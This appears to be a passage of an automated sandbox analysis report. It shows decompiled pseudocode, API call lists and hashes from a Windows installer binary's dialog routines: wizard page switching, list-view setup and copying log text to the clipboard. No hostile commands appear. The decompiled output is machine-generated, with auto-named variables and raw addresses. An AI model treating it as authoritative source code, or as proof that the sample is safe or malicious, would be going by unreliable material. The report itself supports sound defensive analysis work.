            0x004049d6
            0x004049d9
            0x004049d9
            0x0040499a
            0x00000000
            0x00404987
            0x0040496b
            0x00404972
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00404a2f
            0x00404a2f
            0x00404a36
            0x00404aaa
            0x00404ab1
            0x00404abd
            0x00404abd
            0x00404ac6
            0x00404ac8
            0x00404acf
            0x00404ad2
            0x00404ad2
            0x00404ad8
            0x00404adf
            0x00404ae2
            0x00404ae2
            0x00404ae8
            0x00404aee
            0x00404af4
            0x00404af4
            0x00404b01
            0x00404c4e
            0x00404c55
            0x00404c72
            0x00404c78
            0x00404c8a
            0x00404c8a
            0x00000000
            0x00404b07
            0x00404b09
            0x00404b11
            0x00404b15
            0x00404b15
            0x00404b1d
            0x00404b5e
            0x00404b60
            0x00404b70
            0x00404b73
            0x00404b78
            0x00404b7f
            0x00404b82
            0x00404c24
            0x00404c2a
            0x00404c38
            0x00404c49
            0x00404c49
            0x00000000
            0x00404c38
            0x00404b88
            0x00404b8b
            0x00404b91
            0x00404b96
            0x00404b98
            0x00404b9a
            0x00404ba0
            0x00404ba7
            0x00404bac
            0x00404bb3
            0x00404bb6
            0x00404bb6
            0x00404bbd
            0x00404bc9
            0x00404bcd
            0x00404bcf
            0x00404bcf
            0x00404bbf
            0x00404bc1
            0x00404bc1
            0x00404bef
            0x00404bfb
            0x00404c0a
            0x00404c0a
            0x00404c0c
            0x00404c0f
            0x00404c18
            0x00000000
            0x00404b1f
            0x00404b2a
            0x00404b2d
            0x00404b32
            0x00404b34
            0x00404b38
            0x00404b48
            0x00404b52
            0x00404b54
            0x00404b57
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00404b3a
            0x00404b3a
            0x00404b40
            0x00404b42
            0x00404b42
            0x00404b43
            0x00404b44
            0x00000000
            0x00404b3a
            0x00404b1d
            0x00404b01
            0x00404a3e
            0x00000000
            0x00404a54
            0x00404a5e
            0x00404a63
            0x00000000
            0x00000000
            0x00404a75
            0x00404a7a
            0x00404a86
            0x00404a86
            0x00404a88
            0x00404a97
            0x00404a99
            0x00404aa0
            0x00404aa3
            0x00000000
            0x00404aa3
            0x00404a3e
            0x004046fb
            0x00404700
            0x0040470a
            0x0040470b
            0x00404714
            0x0040471f
            0x0040473a
            0x0040474c
            0x00404751
            0x0040475c
            0x00404765
            0x0040477a
            0x0040478b
            0x00404798
            0x00404798
            0x0040479d
            0x004047a3
            0x004047a5
            0x004047a8
            0x004047ad
            0x004047b2
            0x004047b4
            0x004047b4
            0x004047b7
            0x004047b8
            0x004047d4
            0x004047d4
            0x004047d6
            0x004047d7
            0x004047dc
            0x004047df
            0x004047e2
            0x004047e6
            0x004047eb
            0x004047f0
            0x004047f4
            0x004047f9
            0x004047fe
            0x00404800
            0x00404808
            0x004048d2
            0x004048e5
            0x00000000
            0x0040480e
            0x00404811
            0x00404814
            0x00404817
            0x00404817
            0x0040481d
            0x00404823
            0x00404826
            0x0040482c
            0x0040482d
            0x00404832
            0x0040483b
            0x00404842
            0x00404845
            0x00404848
            0x0040484b
            0x00404887
            0x004048b0
            0x00404889
            0x00404896
            0x00404896
            0x0040484d
            0x00404850
            0x0040485f
            0x00404869
            0x00404871
            0x00404878
            0x00404880
            0x00404880
            0x0040484b
            0x004048b6
            0x004048b7
            0x004048c3
            0x004048c3
            0x004048d0
            0x004048eb
            0x004048ef
            0x0040490c
            0x00404911
            0x00404914
            0x00000000
            0x004048f1
            0x004048f6
            0x004048ff
            0x00404c8c
            0x00404c9e
            0x00404c9e
            0x004048ef
            0x00000000
            0x004048d0
            0x00404808

            APIs
            • GetDlgItem.USER32 ref: 004046BE
            • GetDlgItem.USER32 ref: 004046CB
            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
            • LoadBitmapA.USER32 ref: 0040472A
            • SetWindowLongA.USER32 ref: 0040473D
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
            • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
            • DeleteObject.GDI32(?), ref: 0040479D
            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
            • GetWindowLongA.USER32 ref: 004048D7
            • SetWindowLongA.USER32 ref: 004048E5
            • ShowWindow.USER32(?,00000005), ref: 004048F6
            • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
            • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
            • GlobalFree.KERNEL32 ref: 00404AE2
            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
            • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
            • ShowWindow.USER32(?,00000000), ref: 00404C78
            • GetDlgItem.USER32 ref: 00404C83
            • ShowWindow.USER32(00000000), ref: 00404C8A
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
            • String ID: $M$N
            • API String ID: 1638840714-813528018
            • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
            • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
            • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
            • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404EA0, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277windowclipboardmemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				int _t93;
				int _t94;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x7a2764;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					if(_a8 != 0x111) {
						L16:
						if(_a8 != 0x404) {
							L24:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L19;
							} else {
								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t86;
								if(_t86 <= _t148) {
									L36:
									return 0;
								}
								_t88 = CreatePopupMenu();
								_push(0xffffffe1);
								_push(_t148);
								_t159 = _t88;
								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
								_t91 = _a16;
								if(_t91 != 0xffffffff) {
									_t149 = _t91;
									_t93 = _t91 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v24);
									_t149 = _v24.left;
									_t93 = _v24.top;
								}
								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
								_t161 = 1;
								if(_t94 == 1) {
									_v56 = _t148;
									_v44 = 0x79f580;
									_v40 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t100 = GlobalAlloc(0x42, _t161);
									_a4 = _t100;
									_t162 = GlobalLock(_t100);
									do {
										_v44 = _t162;
										SendMessageA(_v8, 0x102d, _t148,  &_v64);
										_t163 =  &(_t162[lstrlenA(_t162)]);
										 *_t163 = 0xa0d;
										_t162 =  &(_t163[2]);
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L36;
							}
						}
						if( *0x7a274c == _t148) {
							ShowWindow( *0x7a2f84, 8);
							if( *0x7a300c == _t148) {
								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
							}
							E00403D80(1);
							goto L24;
						}
						 *0x79e950 = 2;
						E00403D80(0x78);
						goto L19;
					} else {
						if(_a12 != 0x403) {
							L19:
							return E00403E0E(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a2750, _t148);
						ShowWindow(_t153, 8);
						E0040417A();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a2f88;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a2750 = GetDlgItem(_a4, 0x403);
				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2764 = _t127;
				_v8 = _t127;
				E00403DDC( *0x7a2750);
				 *0x7a2754 = E004045FA(4);
				 *0x7a276c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DA7(_a4);
				if(( *0x7a2f90 & 0x00000003) != 0) {
					ShowWindow( *0x7a2750, _t148);
					if(( *0x7a2f90 & 0x00000002) != 0) {
						 *0x7a2750 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x7a2f90 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}
































            0x00404ea9
            0x00404eaf
            0x00404eb8
            0x00404ebb
            0x00405048
            0x0040506c
            0x0040506c
            0x0040507f
            0x0040509c
            0x004050a3
            0x004050fa
            0x004050fe
            0x00000000
            0x00405105
            0x0040510d
            0x00405115
            0x00405118
            0x00405215
            0x00000000
            0x00405215
            0x0040511e
            0x00405124
            0x00405126
            0x00405127
            0x00405133
            0x00405139
            0x0040513f
            0x00405154
            0x0040515a
            0x00405141
            0x00405146
            0x0040514c
            0x0040514f
            0x0040514f
            0x00405168
            0x00405170
            0x00405173
            0x0040517c
            0x0040517f
            0x00405186
            0x0040518d
            0x00405195
            0x00405195
            0x004051ac
            0x004051ac
            0x004051b3
            0x004051b9
            0x004051c2
            0x004051c9
            0x004051d2
            0x004051d4
            0x004051d7
            0x004051e0
            0x004051ec
            0x004051ee
            0x004051f4
            0x004051f5
            0x004051f6
            0x004051fe
            0x00405209
            0x0040520f
            0x0040520f
            0x00000000
            0x00405173
            0x004050fe
            0x004050ab
            0x004050db
            0x004050e3
            0x004050ee
            0x004050ee
            0x004050f5
            0x00000000
            0x004050f5
            0x004050af
            0x004050b9
            0x00000000
            0x00405081
            0x00405087
            0x004050be
            0x00000000
            0x004050c7
            0x00405090
            0x00405095
            0x00405097
            0x00000000
            0x00405097
            0x0040507f
            0x00404ec1
            0x00404ec5
            0x00404ece
            0x00404ed5
            0x00404ed8
            0x00404edb
            0x00404ede
            0x00404edf
            0x00404ee0
            0x00404ef9
            0x00404efc
            0x00404f06
            0x00404f15
            0x00404f1d
            0x00404f25
            0x00404f2a
            0x00404f2d
            0x00404f39
            0x00404f42
            0x00404f4b
            0x00404f6e
            0x00404f74
            0x00404f85
            0x00404f8a
            0x00404f98
            0x00404fa6
            0x00404fa6
            0x00404fab
            0x00404fb9
            0x00404fb9
            0x00404fbe
            0x00404fc1
            0x00404fc6
            0x00404fd2
            0x00404fdb
            0x00404fe8
            0x00404ff7
            0x00404fea
            0x00404fef
            0x00404fef
            0x00404fe8
            0x0040500c
            0x00405015
            0x0040501e
            0x0040502e
            0x0040503a
            0x0040503a
            0x00000000

            APIs
            • GetDlgItem.USER32 ref: 00404EFF
            • GetDlgItem.USER32 ref: 00404F0E
            • GetDlgItem.USER32 ref: 00404F1D
              • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
            • GetClientRect.USER32 ref: 00404F4B
            • GetSystemMetrics.USER32 ref: 00404F53
            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
            • ShowWindow.USER32(?,00000008), ref: 00404FEF
            • GetDlgItem.USER32 ref: 00405005
            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
            • GetDlgItem.USER32 ref: 00405057
            • CreateThread.KERNEL32(00000000,00000000,Function_00004E34,00000000), ref: 00405065
            • CloseHandle.KERNEL32(00000000), ref: 0040506C
            • ShowWindow.USER32(00000000), ref: 00405090
            • ShowWindow.USER32(?,00000008), ref: 00405095
            • ShowWindow.USER32(00000008), ref: 004050DB
            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
            • CreatePopupMenu.USER32 ref: 0040511E
            • AppendMenuA.USER32 ref: 00405133
            • GetWindowRect.USER32 ref: 00405146
            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
            • OpenClipboard.USER32(00000000), ref: 004051B3
            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
            • GlobalLock.KERNEL32 ref: 004051CC
            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
            • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
            • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
            • SetClipboardData.USER32 ref: 00405209
            • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
            • String ID: {
            • API String ID: 1050754034-366298937
            • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
            • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
            • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
            • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004038BF, Relevance: 46.8, APIs: 31, Instructions: 347windowstringCOMMON
            Download Yara Rule
            C-Code - Quality: 77%
            			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x79f56c = _t33;
					if(_t135 == 0x110) {
						 *0x7a2f84 = _t117;
						 *0x79f57c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79e548 = _t89;
						E00403DA7(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
						 *0x7a274c = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x79f56c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x7a2fa0;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403DF3(0x40b);
						while(1) {
							_t35 =  *0x79f56c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x7a2fa4;
							if(_t37 ==  *0x7a2fa4) {
								E00401410(1);
							}
							__eflags =  *0x7a274c;
							if( *0x7a274c != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x7ab000);
							E004059E1(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DA7(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x7a300c;
							_t136 = _t47;
							if( *0x7a300c != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DC9(_t122 & 0x00000002);
							EnableWindow( *0x79e548, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x7a300c;
							if( *0x7a300c == 0) {
								_push( *0x79f57c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x79e548);
							}
							E00403DDC();
							E004059BF(0x79f580, 0x7a2780);
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x79f580[lstrlenA(0x79f580)]));
							E004059E1(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x79f580);
							_push(0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a2758);
									 *0x79ed58 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x7a2758 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DA7(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											_push(0);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
											ShowWindow( *0x7a2758, 8);
											E00403DF3(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x7a300c - _t65;
								if( *0x7a300c != _t65) {
									goto L61;
								}
								__eflags =  *0x7a3000 - _t65;
								if( *0x7a3000 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2758);
						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
						__eflags =  *0x7a2f84;
						EndDialog(_t117,  *0x79e950);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_push(0);
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x7a2758, 0x40f, 0, 1);
						__eflags =  *0x7a274c;
						return 0 |  *0x7a274c == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E0E(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x7a300c;
											if( *0x7a300c == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x79e950 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D80();
												goto L30;
											}
											E00401410(_t134);
											 *0x79e950 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x79e548);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x7a2758);
						 *0x7a2758 = _a12;
						L58:
						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x7a0580 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























            0x004038c9
            0x004038d1
            0x00403a4a
            0x00403a4e
            0x00403a52
            0x00403a54
            0x00403a59
            0x00403a64
            0x00403a6f
            0x00403a74
            0x00403a76
            0x00403a78
            0x00403a7b
            0x00403a80
            0x00403a8e
            0x00403a9b
            0x00403aa2
            0x00403aa2
            0x00403aa3
            0x00403aa3
            0x00403aa8
            0x00403ab5
            0x00403abb
            0x00403abd
            0x00403afd
            0x00403b02
            0x00403b07
            0x00403b07
            0x00403b0c
            0x00403b15
            0x00403b17
            0x00403b1c
            0x00403b22
            0x00403b26
            0x00403b26
            0x00403b2b
            0x00403b32
            0x00000000
            0x00000000
            0x00403b3d
            0x00403b43
            0x00000000
            0x00000000
            0x00403b49
            0x00403b4c
            0x00403b4f
            0x00403b54
            0x00403b59
            0x00403b5c
            0x00403b62
            0x00403b67
            0x00403b6a
            0x00403b70
            0x00403b75
            0x00403b78
            0x00403b7e
            0x00403b86
            0x00403b8c
            0x00403b93
            0x00403b95
            0x00403b9c
            0x00403b9c
            0x00403b9c
            0x00403ba6
            0x00403bb5
            0x00403bc1
            0x00403bd0
            0x00403be7
            0x00403be9
            0x00403bef
            0x00403c04
            0x00403bf1
            0x00403bfa
            0x00403bfc
            0x00403bfc
            0x00403c0a
            0x00403c1a
            0x00403c1f
            0x00403c2a
            0x00403c2b
            0x00403c32
            0x00403c38
            0x00403c3c
            0x00403c41
            0x00403c43
            0x00000000
            0x00403c49
            0x00403c49
            0x00403c4b
            0x00000000
            0x00000000
            0x00403c51
            0x00403c55
            0x00403c7a
            0x00403c80
            0x00403c86
            0x00403c89
            0x00403caf
            0x00403cb5
            0x00403cb7
            0x00403cbc
            0x00403cc2
            0x00403cc5
            0x00403cc8
            0x00403cdf
            0x00403ceb
            0x00403d06
            0x00403d0c
            0x00403d10
            0x00403d1d
            0x00403d28
            0x00403d28
            0x00403cbc
            0x00000000
            0x00403c89
            0x00403c57
            0x00403c5d
            0x00000000
            0x00000000
            0x00403c63
            0x00403c69
            0x00000000
            0x00000000
            0x00000000
            0x00403c6f
            0x00403c43
            0x00403d35
            0x00403d41
            0x00403d41
            0x00403d49
            0x00000000
            0x00403abf
            0x00403abf
            0x00403ac2
            0x00403af5
            0x00403af5
            0x00403af7
            0x00000000
            0x00000000
            0x00000000
            0x00403af7
            0x00403ac4
            0x00403ac8
            0x00403acd
            0x00403acf
            0x00000000
            0x00000000
            0x00403adf
            0x00403ae7
            0x00000000
            0x00403aed
            0x004038e3
            0x004038e3
            0x004038ea
            0x004038fb
            0x004038fb
            0x00403904
            0x0040390d
            0x00403918
            0x00403918
            0x00403924
            0x00403940
            0x00403943
            0x00403958
            0x0040395b
            0x00403990
            0x00403990
            0x00403996
            0x00403a37
            0x00000000
            0x00403a40
            0x0040399c
            0x004039af
            0x004039b1
            0x004039b3
            0x004039d0
            0x004039d3
            0x004039d5
            0x004039da
            0x004039dd
            0x004039ec
            0x004039ef
            0x00403a22
            0x00403a35
            0x00000000
            0x00403a35
            0x004039f1
            0x004039f8
            0x00403a11
            0x00403a16
            0x00403a18
            0x00000000
            0x00000000
            0x00403a1a
            0x00403a06
            0x00403a06
            0x00403a08
            0x00403a08
            0x00000000
            0x00403a08
            0x004039fb
            0x00403a00
            0x00000000
            0x00403a00
            0x004039df
            0x004039e6
            0x00000000
            0x00000000
            0x004039e8
            0x00000000
            0x004039e8
            0x004039d7
            0x00000000
            0x004039d7
            0x004039bf
            0x004039c2
            0x004039c8
            0x004039ca
            0x00000000
            0x00000000
